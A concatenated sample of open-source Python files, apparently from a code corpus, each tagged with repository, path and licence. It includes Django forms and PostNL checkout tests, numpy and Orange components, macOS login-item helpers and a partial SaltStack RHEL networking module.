profil utilisateur.""" class Meta: """Métadonnées du formulaire de mise à jour d'utilisateur.""" ## Modèle associé au formulaire. model = User ## Champs associés au formulaire. #  Permet d'hériter automatiquement des champs depuis le formulaire # par défaut pour l'utilisateur Django. fields = ('first_name', 'last_name', 'email', 'password') class PassengerForm(forms.ModelForm): """Formulaire de mise à jour d'un passager """ ## Champ du prénom du passager first_name = forms.CharField(max_length=30, required=True) ## Champ du nom du passager last_name = forms.CharField(max_length=30, required=True) class Meta: """Métadonnées du formulaire de mise à jour d'un passager""" ## Modèle associé au formulaire. model = Passenger ##Champs associés au formulaire. fields = ('first_name', 'last_name')
DjangoChained/TchouTchouGo
main/forms.py
Python
agpl-3.0
3,957
from __future__ import division, absolute_import, print_function import sys from setuptools.command.egg_info import egg_info as _egg_info class egg_info(_egg_info): def run(self): if 'sdist' in sys.argv: import warnings warnings.warn("`build_src` is being run, this may lead to missing " "files in your sdist! See numpy issue gh-7127 for " "details", UserWarning) # We need to ensure that build_src has been executed in order to give # setuptools' egg_info command real filenames instead of functions which # generate files. self.run_command("build_src") _egg_info.run(self)
JFriel/honours_project
venv/lib/python2.7/site-packages/numpy/distutils/command/egg_info.py
Python
gpl-3.0
708
from mitmproxy.contentviews import query from mitmproxy.coretypes import multidict from . import full_eval def test_view_query(): d = "" v = full_eval(query.ViewQuery()) f = v(d, query=multidict.MultiDict([("foo", "bar"), ("foo", "baz")])) assert f[0] == "Query" assert f[1] == [[("header", "foo: "), ("text", "bar")], [("header", "foo: "), ("text", "baz")]] assert v(d) == ("Query", [])
vhaupert/mitmproxy
test/mitmproxy/contentviews/test_query.py
Python
mit
415
import datetime import decimal from django.test import TestCase from django.core.cache import cache from httmock import HTTMock from django_dynamic_fixture import G, N from postnl_checkout.contrib.django_postnl_checkout.models import Order from .base import PostNLTestMixin class OrderTests(PostNLTestMixin, TestCase): """ Tests for Order model. """ maxDiff = None def setUp(self): super(OrderTests, self).setUp() self.order_datum = datetime.datetime( year=2011, month=7, day=21, hour=20, minute=11, second=0 ) self.verzend_datum = datetime.datetime( year=2011, month=7, day=22, hour=20, minute=11, second=0 ) def test_save(self): """ Test saving an Order model. """ instance = N(Order) instance.clean() instance.save() def test_prepare_order(self): """ Test prepare_order class method. """ # Setup mock response def response(url, request): self.assertXMLEqual( request.body, self.read_file('prepare_order_request.xml') ) return self.read_file('prepare_order_response.xml') kwargs = { 'AangebodenBetaalMethoden': { 'PrepareOrderBetaalMethode': { 'Code': 'IDEAL', 'Prijs': '5.00' } }, 'AangebodenCommunicatieOpties': { 'PrepareOrderCommunicatieOptie': { 'Code': 'NEWS' } }, # FIXME: the following is not submitted by SUDS # Most probably because it is not properly defined in the WSDL # Contact PostNL about this. # 'AangebodenOpties': { # 'PrepareOrderOptie': { # 'Code': 'WRAP', # 'Prijs': '2.50' # } # }, # 'AfleverOpties': { # 'AfleverOptie': { # 'Code': 'PG', # 'Kosten': '0.00', # 'Toegestaan': True # } # }, 'Consument': { 'ExtRef': 'test@e-id.nl' }, 'Contact': { 'Url': 'http://www.kadowereld.nl/url/contact' }, 'Order': { 'ExtRef': '1105_900', 'OrderDatum': self.order_datum, 'Subtotaal': '125.00', 'VerzendDatum': self.verzend_datum, 'VerzendKosten': '12.50' }, 'Retour': { 'BeschrijvingUrl': 'http://www.kadowereld.nl/url/beschrijving', 'PolicyUrl': 'http://www.kadowereld.nl/url/policy', 'RetourTermijn': 28, 'StartProcesUrl': 'http://www.kadowereld.nl/url/startproces' }, 'Service': { 'Url': 'http://www.kadowereld.nl/url/service' } } # Execute API call with HTTMock(response): instance = Order.prepare_order(**kwargs) # Assert model field values self.assertTrue(instance.pk) self.assertEquals( instance.order_token, '0cfb4be2-47cf-4eac-865c-d66657953d5c' ) self.assertEquals( instance.order_ext_ref, '1105_900' ) self.assertEquals( instance.order_date, self.order_datum ) # Assert JSON values self.assertEquals(instance.prepare_order_request, kwargs) self.assertEquals(instance.prepare_order_response, { 'Checkout': { 'OrderToken': '0cfb4be2-47cf-4eac-865c-d66657953d5c', 'Url': ( 'http://tpppm-test.e-id.nl/Orders/OrderCheckout' '?token=0cfb4be2-47cf-4eac-865c-d66657953d5c' ) }, 'Webshop': { 'IntRef': 'a0713e4083a049a996c302f48bb3f535' } }) def test_read_order(self): """ Test read_order method. """ # Setup mock response def response(url, request): self.assertXMLEqual( request.body, self.read_file('read_order_request.xml') ) return self.read_file('read_order_response.xml') instance = G( Order, order_token='0cfb4be2-47cf-4eac-865c-d66657953d5c' ) # Read order data with HTTMock(response): new_instance = instance.read_order() response_data = new_instance.read_order_response self.assertTrue(response_data) self.assertEquals(response_data, { 'Voorkeuren': { 'Bezorging': { 'Tijdvak': { 'Start': u'10:30', 'Eind': u'08:30' }, 'Datum': datetime.datetime(2012, 4, 26, 0, 0) } }, 'Consument': { 'GeboorteDatum': datetime.datetime(1977, 6, 15, 0, 0), 'ExtRef': u'jjansen', 'TelefoonNummer': u'06-12345678', 'Email': u'j.jansen@e-id.nl' }, 'Facturatie': { 'Adres': { 'Huisnummer': u'1', 'Initialen': u'J', 'Geslacht': u'Meneer', 'Deurcode': None, 'Gebruik': u'P', 'Gebouw': None, 'Verdieping': None, 'Achternaam': u'Jansen', 'Afdeling': None, 'Regio': None, 'Land': u'NL', 'Wijk': None, 'Postcode': u'4131LV', 'Straat': 'Lage Biezenweg', 'Bedrijf': None, 'Plaats': u'Vianen', 'Tussenvoegsel': None, 'Voornaam': u'Jan', 'HuisnummerExt': None } }, 'Webshop': { 'IntRef': u'a0713e4083a049a996c302f48bb3f535' }, 'CommunicatieOpties': { 'ReadOrderResponseCommunicatieOptie': [ { 'Text': u'Do not deliver to neighbours', 'Code': u'REMARK' } ] }, 'Bezorging': { 'ServicePunt': { 'Huisnummer': None, 'Initialen': None, 'Geslacht': None, 'Deurcode': None, 'Gebruik': None, 'Gebouw': None, 'Verdieping': None, 'Achternaam': None, 'Afdeling': None, 'Regio': None, 'Land': None, 'Wijk': None, 'Postcode': None, 'Straat': None, 'Bedrijf': None, 'Plaats': None, 'Tussenvoegsel': None, 'Voornaam': None, 'HuisnummerExt': None }, 'Geadresseerde': { 'Huisnummer': u'1', 'Initialen': u'J', 'Geslacht': u'Meneer', 'Deurcode': None, 'Gebruik': u'Z', 'Gebouw': None, 'Verdieping': None, 'Achternaam': u'Janssen', 'Afdeling': None, 'Regio': None, 'Land': u'NL', 'Wijk': None, 'Postcode': u'4131LV', 'Straat': u'Lage Biezenweg ', 'Bedrijf': u'E-ID', 'Plaats': u'Vianen', 'Tussenvoegsel': None, 'Voornaam': u'Jan', 'HuisnummerExt': None } }, 'Opties': { 'ReadOrderResponseOpties': [ { 'Text': u'Congratulat ions with your new foobar!', 'Code': u'CARD', 'Prijs': decimal.Decimal('2.00') } ] }, 'Order': { 'ExtRef': u'15200_001' }, 'BetaalMethode': { 'Optie': u'0021', 'Code': u'IDEAL', 'Prijs': decimal.Decimal('0.00') } }) def test_confirm_order(self): """ Test confirm_order """ def response(url, request): self.assertXMLEqual( request.body, self.read_file('confirm_order_request.xml') ) return self.read_file('confirm_order_response.xml') kwargs = { 'Order': { 'PaymentTotal': decimal.Decimal('183.25') } } instance = G( Order, order_token='0cfb4be2-47cf-4eac-865c-d66657953d5c', order_ext_ref='1105_900' ) # Execute API call with HTTMock(response): instance.confirm_order(**kwargs) def test_update_order(self): """ Test update_order """ def response_success(url, request): self.assertXMLEqual( request.body, self.read_file('update_order_request.xml') ) return self.read_file('update_order_response_success.xml') def response_fail(url, request): self.assertXMLEqual( request.body, self.read_file('update_order_request.xml') ) return self.read_file('update_order_response_fail.xml') kwargs = { 'Order': { 'ExtRef': 'FDK004', 'Zending': { 'UpdateOrderOrderZending': { 'Busstuk': { 'UpdateOrderOrderZendingBusstuk': { 'Verzonden': '23-08-2011 12:00:00' } }, 'ExtRef': '642be996-6ab3-4a4c-b7d6-2417a4cee0df', 'Pakket': { 'UpdateOrderOrderZendingPakket': { 'Barcode': '3s123456789', 'Postcode': '4131LV' } } } } } } instance = G( Order, order_token='0cfb4be2-47cf-4eac-865c-d66657953d5c', order_ext_ref='1105_900' ) # Make call fail with HTTMock(response_fail): self.assertRaises( Exception, lambda: instance.update_order(**kwargs) ) # Make call pass with HTTMock(response_success): response = instance.update_order(**kwargs) self.assertTrue(response) # Make sure the requested stuff is saved self.assertEquals( instance.update_order_request, { 'Checkout': { 'OrderToken': '0cfb4be2-47cf-4eac-865c-d66657953d5c' }, 'Order': { 'ExtRef': 'FDK004', 'Zending': { 'UpdateOrderOrderZending': { 'Busstuk': { 'UpdateOrderOrderZendingBusstuk': { 'Verzonden': '23-08-2011 12:00:00' } }, 'ExtRef': '642be996-6ab3-4a4c-b7d6-2417a4cee0df', 'Pakket': { 'UpdateOrderOrderZendingPakket': { 'Barcode': '3s123456789', 'Postcode': '4131LV' } } } } } } ) def test_ping_status(self): """ Test ping_status """ instance = G(Order) self.response_called = 0 def ok_response(url, request): # Assert self.assertXMLEqual( request.body, self.read_file('ping_status_request.xml') ) self.response_called += 1 return self.read_file('ping_status_response_ok.xml') def nok_response(url, request): return self.read_file('ping_status_response_nok.xml') with HTTMock(ok_response): self.assertEquals(instance.ping_status(), True) self.assertEquals(self.response_called, 1) # Repeated call should not cause the response to be called with HTTMock(ok_response): self.assertEquals(instance.ping_status(), True) self.assertEquals(self.response_called, 1) # Clear cache cache.clear() with HTTMock(nok_response): self.assertEquals(instance.ping_status(), False)
dokterbob/python-postnl-checkout
tests/test_django.py
Python
agpl-3.0
13,320
import numpy as np import geopy from map import Map class Greengraph(object): def __init__(self, start, end): self.start=start self.end=end self.geocoder=geopy.geocoders.GoogleV3(domain="maps.google.co.uk") def geolocate(self, place): return self.geocoder.geocode(place, exactly_one=False)[0][1] def location_sequence(self, start,end,steps): lats = np.linspace(start[0], end[0], steps) longs = np.linspace(start[1],end[1], steps) return np.vstack([lats, longs]).transpose() def green_between(self, steps): return [Map(*location).count_green() for location in self.location_sequence( self.geolocate(self.start), self.geolocate(self.end), steps)]
simonschaal/greengraph
greengraph/graph.py
Python
mit
813
""" """ import Orange.data import Orange.regression.knn as knn import Orange.classification from Orange.preprocess.preprocess import Preprocess from Orange.widgets import widget, gui from Orange.widgets.settings import Setting class OWKNNRegression(widget.OWWidget): name = "k Nearest Neighbors Regression" description = "K-nearest neighbours learner/model." icon = "icons/kNearestNeighbours.svg" priority = 20 inputs = [("Data", Orange.data.Table, "set_data"), ("Preprocessor", Preprocess, "set_preprocessor")] outputs = [("Learner", knn.KNNRegressionLearner), ("Predictor", Orange.classification.SklModel)] want_main_area = False learner_name = Setting("k Nearest Neighbors Regression") n_neighbors = Setting(5) metric_index = Setting(0) def __init__(self, parent=None): super().__init__(parent) self.preprocessors = () self.data = None box = gui.widgetBox(self.controlArea, "Learner/Model Name") gui.lineEdit(box, self, "learner_name") box = gui.widgetBox(self.controlArea, "Neighbors") gui.spin(box, self, "n_neighbors", 1, 100, label="Number of neighbors") box = gui.widgetBox(box, "Metric") box.setFlat(True) box.layout().setContentsMargins(0, 0, 0, 0) gui.comboBox(box, self, "metric_index", items=["Euclidean", "Manhattan", "Maximal", "Mahalanobis"]) self.metrics = ["euclidean", "manhattan", "chebyshev", "mahalanobis"] gui.button(self.controlArea, self, "Apply", callback=self.apply, default=True) layout = self.layout() self.layout().setSizeConstraint(layout.SetFixedSize) self.apply() def set_data(self, data): """Set input training dataset.""" self.data = data if data is not None: self.apply() def set_preprocessor(self, preproc): """Set preprocessor to apply on training data.""" if preproc is None: self.preprocessors = None else: self.preprocessors = (preproc,) self.apply() def apply(self): """ Construct the learner and apply it on the training data if available. """ learner = knn.KNNRegressionLearner( n_neighbors=self.n_neighbors, metric=self.metrics[self.metric_index], preprocessors=self.preprocessors ) learner.name = self.learner_name model = None if self.data is not None: model = learner(self.data) model.name = self.learner_name self.send("Learner", learner) self.send("Predictor", model)
qusp/orange3
Orange/widgets/regression/owknnregression.py
Python
bsd-2-clause
2,723
from math import * from PyQt4 import QtCore def mySquare (val) : return (sqrt(val)) """Function will take the name of an image file and then get the range of images that associate with that image name. """ def getImageRange (imageDir, imstring) : # get the index of the start of the .txt suffix then # find the start of the _xxx where xxx are the image numbers qd = QtCore.QDir (imageDir) qd.setNameFilters (QtCore.QStringList()<<"*.tif") filelist = qd.entryList() nfiles = filelist.count() min = 1e6 max = -1e6 lastind = imstring.lastIndexOf('.tif')-3 firstind = imstring.lastIndexOf ("/") if (firstind <0) : firstind = imstring.lastIndexOf('\\') firstind = firstind + 1 matchstring = imstring.mid(firstind, lastind-firstind) print 'Debug : Matchstring = ',matchstring for i in range(nfiles) : print filelist[i] if not (filelist[i].contains(".tif")) : continue if (filelist[i].contains (matchstring)) : print i, 'made it' tmpind = filelist[i].lastIndexOf (".tif") str = filelist[i].mid(tmpind-3,3) val = str.toInt() print val[0] if (val[0] > max) : max = val[0] if (val[0] < min) : min = val[0] print 'Min max are : ', min, max tmpind = imstring.lastIndexOf (".tif") str = imstring.mid(tmpind-3,3) val = str.toInt() minmax = [min, max, val[0]] return minmax
kirillzhuravlev/atrex
Software/atrex_utils.py
Python
lgpl-3.0
1,538
from Foundation import NSBundle import halfcaff.util APPDIR = None if not halfcaff.util.is_dev_mode(): APPDIR = NSBundle.mainBundle().bundlePath() def is_login_enabled(): if not APPDIR: return False return APPDIR in list_login_items() def enable_startup_at_login(): add_login_item(APPDIR) def disable_startup_at_login(): remove_login_item(APPDIR) #### From https://github.com/pudquick/pyLoginItems/ # /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Headers/LSSharedFileList.h # Fun things: # kLSSharedFileListFavoriteItems # kLSSharedFileListFavoriteVolumes # kLSSharedFileListRecentApplicationItems # kLSSharedFileListRecentDocumentItems # kLSSharedFileListRecentServerItems # kLSSharedFileListSessionLoginItems # kLSSharedFileListGlobalLoginItems - deprecated in 10.9 # Runs in user space, use this with a login script / launchd item / something running as the user # Example usage: # # import pyLoginItems # >>> pyLoginItems.list_login_items() # [u'/Applications/Dropbox.app', u'/Applications/iTunes.app/Contents/MacOS/iTunesHelper.app'] # # pyLoginItems.add_login_item('/Applications/Safari.app', 0) # pyLoginItems.remove_login_item('/Applications/TextEdit.app') from platform import mac_ver from Foundation import NSURL from LaunchServices import kLSSharedFileListSessionLoginItems, kLSSharedFileListNoUserInteraction # Need to manually load in 10.11.x+ os_vers = int(mac_ver()[0].split('.')[1]) if os_vers > 10: from Foundation import NSBundle import objc SFL_bundle = NSBundle.bundleWithIdentifier_('com.apple.coreservices.SharedFileList') functions = [('LSSharedFileListCreate', '^{OpaqueLSSharedFileListRef=}^{__CFAllocator=}^{__CFString=}@'), ('LSSharedFileListCopySnapshot', '^{__CFArray=}^{OpaqueLSSharedFileListRef=}o^I'), ('LSSharedFileListItemCopyDisplayName', '^{__CFString=}^{OpaqueLSSharedFileListItemRef=}'), ('LSSharedFileListItemResolve', 'i^{OpaqueLSSharedFileListItemRef=}Io^^{__CFURL=}o^{FSRef=[80C]}'), ('LSSharedFileListItemMove', 'i^{OpaqueLSSharedFileListRef=}^{OpaqueLSSharedFileListItemRef=}^{OpaqueLSSharedFileListItemRef=}'), ('LSSharedFileListItemRemove', 'i^{OpaqueLSSharedFileListRef=}^{OpaqueLSSharedFileListItemRef=}'), ('LSSharedFileListInsertItemURL', '^{OpaqueLSSharedFileListItemRef=}^{OpaqueLSSharedFileListRef=}^{OpaqueLSSharedFileListItemRef=}^{__CFString=}^{OpaqueIconRef=}^{__CFURL=}^{__CFDictionary=}^{__CFArray=}'), ('kLSSharedFileListItemBeforeFirst', '^{OpaqueLSSharedFileListItemRef=}'), ('kLSSharedFileListItemLast', '^{OpaqueLSSharedFileListItemRef=}'),] objc.loadBundleFunctions(SFL_bundle, globals(), functions) else: from LaunchServices import kLSSharedFileListItemBeforeFirst, kLSSharedFileListItemLast, \ LSSharedFileListCreate, LSSharedFileListCopySnapshot, \ LSSharedFileListItemCopyDisplayName, LSSharedFileListItemResolve, \ LSSharedFileListItemMove, LSSharedFileListItemRemove, \ LSSharedFileListInsertItemURL def _get_login_items(): # Setup the type of shared list reference we want list_ref = LSSharedFileListCreate(None, kLSSharedFileListSessionLoginItems, None) # Get the user's login items - actually returns two values, with the second being a seed value # indicating when the snapshot was taken (which is safe to ignore here) login_items,_ = LSSharedFileListCopySnapshot(list_ref, None) return [list_ref, login_items] def _get_item_cfurl(an_item, flags=None): if flags is None: # Attempt to resolve the items without interacting or mounting flags = kLSSharedFileListNoUserInteraction + kLSSharedFileListNoUserInteraction err, a_CFURL, a_FSRef = LSSharedFileListItemResolve(an_item, flags, None, None) return a_CFURL def list_login_items(): # Attempt to find the URLs for the items without mounting drives URLs = [] for an_item in _get_login_items()[1]: URLs.append(_get_item_cfurl(an_item).path()) return URLs def remove_login_item(path_to_item): current_paths = list_login_items() if path_to_item in current_paths: list_ref, current_items = _get_login_items() i = current_paths.index(path_to_item) target_item = current_items[i] result = LSSharedFileListItemRemove(list_ref, target_item) def add_login_item(path_to_item, position=-1): # position: # 0..N: Attempt to insert at that index position, with 0 being first # -1: Insert as last item # Note: # If the item is already present in the list, it will get moved to the new location automatically. list_ref, current_items = _get_login_items() added_item = NSURL.fileURLWithPath_(path_to_item) if position == 0: # Seems to be buggy, will force it below destination_point = kLSSharedFileListItemBeforeFirst elif position == -1: destination_point = kLSSharedFileListItemLast elif position >= len(current_items): # At or beyond to the end of the current list position = -1 destination_point = kLSSharedFileListItemLast else: # 1 = after item 0, 2 = after item 1, etc. destination_point = current_items[position - 1] # The logic for LSSharedFileListInsertItemURL is generally fine when the item is not in the list # already (with the exception of kLSSharedFileListItemBeforeFirst which appears to be broken, period) # However, if the item is already in the list, the logic gets really really screwy. # Your index calculations are invalidated by OS X because you shift an item, possibly shifting the # indexes of other items in the list. # It's easier to just remove it first, then re-add it. current_paths = list_login_items() if (len(current_items) == 0) or (position == -1): # Either there's nothing there or it wants to be last # Just add the item, it'll be fine result = LSSharedFileListInsertItemURL(list_ref, destination_point, None, None, added_item, {}, []) elif (position == 0): # Special case - kLSSharedFileListItemBeforeFirst appears broken on (at least) 10.9 # Remove if already in the list if path_to_item in current_paths: i = current_paths.index(path_to_item) old_item = current_items[i] result = LSSharedFileListItemRemove(list_ref, old_item) # Regenerate list_ref and items list_ref, current_items = _get_login_items() if (len(current_items) == 0): # Simple case if nothing remains in the list result = LSSharedFileListInsertItemURL(list_ref, destination_point, None, None, added_item, {}, []) else: # At least one item remains. # The fix for the bug is: # - Add our item after the first ('needs_fixing') item # - Move the 'needs_fixing' item to the end # - Move the 'needs_fixing' item after our added item (which is now first) needs_fixing = _get_item_cfurl(current_items[0]) # Move our item result = LSSharedFileListInsertItemURL(list_ref, current_items[0], None, None, added_item, {}, []) if not (result is None): # Only shift if the first insert worked # Regenerate list_ref and items list_ref, current_items = _get_login_items() # Now move the old item last result = LSSharedFileListInsertItemURL(list_ref, kLSSharedFileListItemLast, None, None, needs_fixing, {}, []) # Regenerate list_ref and items list_ref, current_items = _get_login_items() # Now move the old item back under the new one result = LSSharedFileListInsertItemURL(list_ref, current_items[0], None, None, needs_fixing, {}, []) else: # We're aiming for an index based on something else in the list. # Only do something if we're not aiming at ourselves. insert_after_path = _get_item_cfurl(destination_point).path() if (insert_after_path != path_to_item): # Seems to be a different file if path_to_item in current_paths: # Remove our object if it's already present i = current_paths.index(path_to_item) self_item = current_items[i] result = LSSharedFileListItemRemove(list_ref, self_item) # Regenerate list_ref and items list_ref, current_items = _get_login_items() # Re-find our original target current_paths = list_login_items() i = current_paths.index(insert_after_path) destination_point = current_items[i] # Add ourselves after the file result = LSSharedFileListInsertItemURL(list_ref, destination_point, None, None, added_item, {}, [])
dougn/HalfCaff
halfcaff/login.py
Python
mit
9,234
# -*- coding: utf-8 -*- ''' The networking module for RHEL/Fedora based distros ''' from __future__ import absolute_import # Import python libs import logging import os.path import os # Import third party libs import jinja2 import jinja2.exceptions # Import salt libs import salt.utils import salt.utils.templates import salt.utils.validate.net import salt.ext.six as six # Set up logging log = logging.getLogger(__name__) # Set up template environment JINJA = jinja2.Environment( loader=jinja2.FileSystemLoader( os.path.join(salt.utils.templates.TEMPLATE_DIRNAME, 'rh_ip') ) ) # Define the module's virtual name __virtualname__ = 'ip' def __virtual__(): ''' Confine this module to RHEL/Fedora based distros ''' if __grains__['os_family'] == 'RedHat': return __virtualname__ return False # Setup networking attributes _ETHTOOL_CONFIG_OPTS = [ 'autoneg', 'speed', 'duplex', 'rx', 'tx', 'sg', 'tso', 'ufo', 'gso', 'gro', 'lro' ] _RH_CONFIG_OPTS = [ 'domain', 'peerdns', 'peerntp', 'defroute', 'mtu', 'static-routes', 'gateway', 'zone' ] _RH_CONFIG_BONDING_OPTS = [ 'mode', 'miimon', 'arp_interval', 'arp_ip_target', 'downdelay', 'updelay', 'use_carrier', 'lacp_rate', 'hashing-algorithm', 'max_bonds', 'tx_queues', 'num_grat_arp', 'num_unsol_na', 'primary', 'primary_reselect', 'ad_select', 'xmit_hash_policy', 'arp_validate', 'fail_over_mac', 'all_slaves_active', 'resend_igmp' ] _RH_NETWORK_SCRIPT_DIR = '/etc/sysconfig/network-scripts' _RH_NETWORK_FILE = '/etc/sysconfig/network' _RH_NETWORK_CONF_FILES = '/etc/modprobe.d' _CONFIG_TRUE = ['yes', 'on', 'true', '1', True] _CONFIG_FALSE = ['no', 'off', 'false', '0', False] _IFACE_TYPES = [ 'eth', 'bond', 'alias', 'clone', 'ipsec', 'dialup', 'bridge', 'slave', 'vlan', 'ipip', 'ib', ] def _error_msg_iface(iface, option, expected): ''' Build an appropriate error message from a given option and a list of expected values. ''' msg = 'Invalid option -- Interface: {0}, Option: {1}, Expected: [{2}]' return msg.format(iface, option, '|'.join(expected)) def _error_msg_routes(iface, option, expected): ''' Build an appropriate error message from a given option and a list of expected values. ''' msg = 'Invalid option -- Route interface: {0}, Option: {1}, Expected: [{2}]' return msg.format(iface, option, expected) def _log_default_iface(iface, opt, value): msg = 'Using default option -- Interface: {0} Option: {1} Value: {2}' log.info(msg.format(iface, opt, value)) def _error_msg_network(option, expected): ''' Build an appropriate error message from a given option and a list of expected values. ''' msg = 'Invalid network setting -- Setting: {0}, Expected: [{1}]' return msg.format(option, '|'.join(expected)) def _log_default_network(opt, value): msg = 'Using existing setting -- Setting: {0} Value: {1}' log.info(msg.format(opt, value)) def _parse_rh_config(path): rh_config = _read_file(path) cv_rh_config = {} if rh_config: for line in rh_config: line = line.strip() if len(line) == 0 or line.startswith('!') or line.startswith('#'): continue pair = [p.rstrip() for p in line.split('=', 1)] if len(pair) != 2: continue name, value = pair cv_rh_config[name.upper()] = value return cv_rh_config def _parse_ethtool_opts(opts, iface): ''' Filters given options and outputs valid settings for ETHTOOLS_OPTS If an option has a value that is not expected, this function will log what the Interface, Setting and what it was expecting. ''' config = {} if 'autoneg' in opts: if opts['autoneg'] in _CONFIG_TRUE: config.update({'autoneg': 'on'}) elif opts['autoneg'] in _CONFIG_FALSE: config.update({'autoneg': 'off'}) else: _raise_error_iface(iface, 'autoneg', _CONFIG_TRUE + _CONFIG_FALSE) if 'duplex' in opts: valid = ['full', 'half'] if opts['duplex'] in valid: config.update({'duplex': opts['duplex']}) else: _raise_error_iface(iface, 'duplex', valid) if 'speed' in opts: valid = ['10', '100', '1000', '10000'] if str(opts['speed']) in valid: config.update({'speed': opts['speed']}) else: _raise_error_iface(iface, opts['speed'], valid) valid = _CONFIG_TRUE + _CONFIG_FALSE for option in ('rx', 'tx', 'sg', 'tso', 'ufo', 'gso', 'gro', 'lro'): if option in opts: if opts[option] in _CONFIG_TRUE: config.update({option: 'on'}) elif opts[option] in _CONFIG_FALSE: config.update({option: 'off'}) else: _raise_error_iface(iface, option, valid) return config def _parse_settings_bond(opts, iface): ''' Filters given options and outputs valid settings for requested operation. If an option has a value that is not expected, this function will log what the Interface, Setting and what it was expecting. ''' bond_def = { # 803.ad aggregation selection logic # 0 for stable (default) # 1 for bandwidth # 2 for count 'ad_select': '0', # Max number of transmit queues (default = 16) 'tx_queues': '16', # Link monitoring in milliseconds. Most NICs support this 'miimon': '100', # ARP interval in milliseconds 'arp_interval': '250', # Delay before considering link down in milliseconds (miimon * 2) 'downdelay': '200', # lacp_rate 0: Slow - every 30 seconds # lacp_rate 1: Fast - every 1 second 'lacp_rate': '0', # Max bonds for this driver 'max_bonds': '1', # Specifies the time, in milliseconds, to wait before # enabling a slave after a link recovery has been # detected. Only used with miimon. 'updelay': '0', # Used with miimon. # On: driver sends mii # Off: ethtool sends mii 'use_carrier': 'on', # Default. Don't change unless you know what you are doing. 'xmit_hash_policy': 'layer2', } if opts['mode'] in ['balance-rr', '0']: log.info( 'Device: {0} Bonding Mode: load balancing (round-robin)'.format( iface ) ) return _parse_settings_bond_0(opts, iface, bond_def) elif opts['mode'] in ['active-backup', '1']: log.info( 'Device: {0} Bonding Mode: fault-tolerance (active-backup)'.format( iface ) ) return _parse_settings_bond_1(opts, iface, bond_def) elif opts['mode'] in ['balance-xor', '2']: log.info( 'Device: {0} Bonding Mode: load balancing (xor)'.format(iface) ) return _parse_settings_bond_2(opts, iface, bond_def) elif opts['mode'] in ['broadcast', '3']: log.info( 'Device: {0} Bonding Mode: fault-tolerance (broadcast)'.format( iface ) ) return _parse_settings_bond_3(opts, iface, bond_def) elif opts['mode'] in ['802.3ad', '4']: log.info( 'Device: {0} Bonding Mode: IEEE 802.3ad Dynamic link ' 'aggregation'.format(iface) ) return _parse_settings_bond_4(opts, iface, bond_def) elif opts['mode'] in ['balance-tlb', '5']: log.info( 'Device: {0} Bonding Mode: transmit load balancing'.format(iface) ) return _parse_settings_bond_5(opts, iface, bond_def) elif opts['mode'] in ['balance-alb', '6']: log.info( 'Device: {0} Bonding Mode: adaptive load balancing'.format(iface) ) return _parse_settings_bond_6(opts, iface, bond_def) else: valid = [ '0', '1', '2', '3', '4', '5', '6', 'balance-rr', 'active-backup', 'balance-xor', 'broadcast', '802.3ad', 'balance-tlb', 'balance-alb' ] _raise_error_iface(iface, 'mode', valid) def _parse_settings_bond_0(opts, iface, bond_def): ''' Filters given options and outputs valid settings for bond0. If an option has a value that is not expected, this function will log what the Interface, Setting and what it was expecting. ''' bond = {'mode': '0'} # ARP targets in n.n.n.n form valid = ['list of ips (up to 16)'] if 'arp_ip_target' in opts: if isinstance(opts['arp_ip_target'], list): if 1 <= len(opts['arp_ip_target']) <= 16: bond.update({'arp_ip_target': ''}) for ip in opts['arp_ip_target']: # pylint: disable=C0103 if len(bond['arp_ip_target']) > 0: bond['arp_ip_target'] = bond['arp_ip_target'] + ',' + ip else: bond['arp_ip_target'] = ip else: _raise_error_iface(iface, 'arp_ip_target', valid) else: _raise_error_iface(iface, 'arp_ip_target', valid) else: _raise_error_iface(iface, 'arp_ip_target', valid) if 'arp_interval' in opts: try: int(opts['arp_interval']) bond.update({'arp_interval': opts['arp_interval']}) except Exception: _raise_error_iface(iface, 'arp_interval', ['integer']) else: _log_default_iface(iface, 'arp_interval', bond_def['arp_interval']) bond.update({'arp_interval': bond_def['arp_interval']}) return bond def _parse_settings_bond_1(opts, iface, bond_def): ''' Filters given options and outputs valid settings for bond1. If an option has a value that is not expected, this function will log what the Interface, Setting and what it was expecting. ''' bond = {'mode': '1'} for binding in ['miimon', 'downdelay', 'updelay']: if binding in opts: try: int(opts[binding]) bond.update({binding: opts[binding]}) except Exception: _raise_error_iface(iface, binding, ['integer']) else: _log_default_iface(iface, binding, bond_def[binding]) bond.update({binding: bond_def[binding]}) if 'use_carrier' in opts: if opts['use_carrier'] in _CONFIG_TRUE: bond.update({'use_carrier': '1'}) elif opts['use_carrier'] in _CONFIG_FALSE: bond.update({'use_carrier': '0'}) else: valid = _CONFIG_TRUE + _CONFIG_FALSE _raise_error_iface(iface, 'use_carrier', valid) else: _log_default_iface(iface, 'use_carrier', bond_def['use_carrier']) bond.update({'use_carrier': bond_def['use_carrier']}) return bond def _parse_settings_bond_2(opts, iface, bond_def): ''' Filters given options and outputs valid settings for bond2. If an option has a value that is not expected, this function will log what the Interface, Setting and what it was expecting. ''' bond = {'mode': '2'} valid = ['list of ips (up to 16)'] if 'arp_ip_target' in opts: if isinstance(opts['arp_ip_target'], list): if 1 <= len(opts['arp_ip_target']) <= 16: bond.update({'arp_ip_target': ''}) for ip in opts['arp_ip_target']: # pylint: disable=C0103 if len(bond['arp_ip_target']) > 0: bond['arp_ip_target'] = bond['arp_ip_target'] + ',' + ip else: bond['arp_ip_target'] = ip else: _raise_error_iface(iface, 'arp_ip_target', valid) else: _raise_error_iface(iface, 'arp_ip_target', valid) else: _raise_error_iface(iface, 'arp_ip_target', valid) if 'arp_interval' in opts: try: int(opts['arp_interval']) bond.update({'arp_interval': opts['arp_interval']}) except Exception: _raise_error_iface(iface, 'arp_interval', ['integer']) else: _log_default_iface(iface, 'arp_interval', bond_def['arp_interval']) bond.update({'arp_interval': bond_def['arp_interval']}) if 'primary' in opts: bond.update({'primary': opts['primary']}) if 'hashing-algorithm' in opts: valid = ['layer2', 'layer2+3', 'layer3+4'] if opts['hashing-algorithm'] in valid: bond.update({'xmit_hash_policy': opts['hashing-algorithm']}) else: _raise_error_iface(iface, 'hashing-algorithm', valid) return bond def _parse_settings_bond_3(opts, iface, bond_def): ''' Filters given options and outputs valid settings for bond3. If an option has a value that is not expected, this function will log what the Interface, Setting and what it was expecting. ''' bond = {'mode': '3'} for binding in ['miimon', 'downdelay', 'updelay']: if binding in opts: try: int(opts[binding]) bond.update({binding: opts[binding]}) except Exception: _raise_error_iface(iface, binding, ['integer']) else: _log_default_iface(iface, binding, bond_def[binding]) bond.update({binding: bond_def[binding]}) if 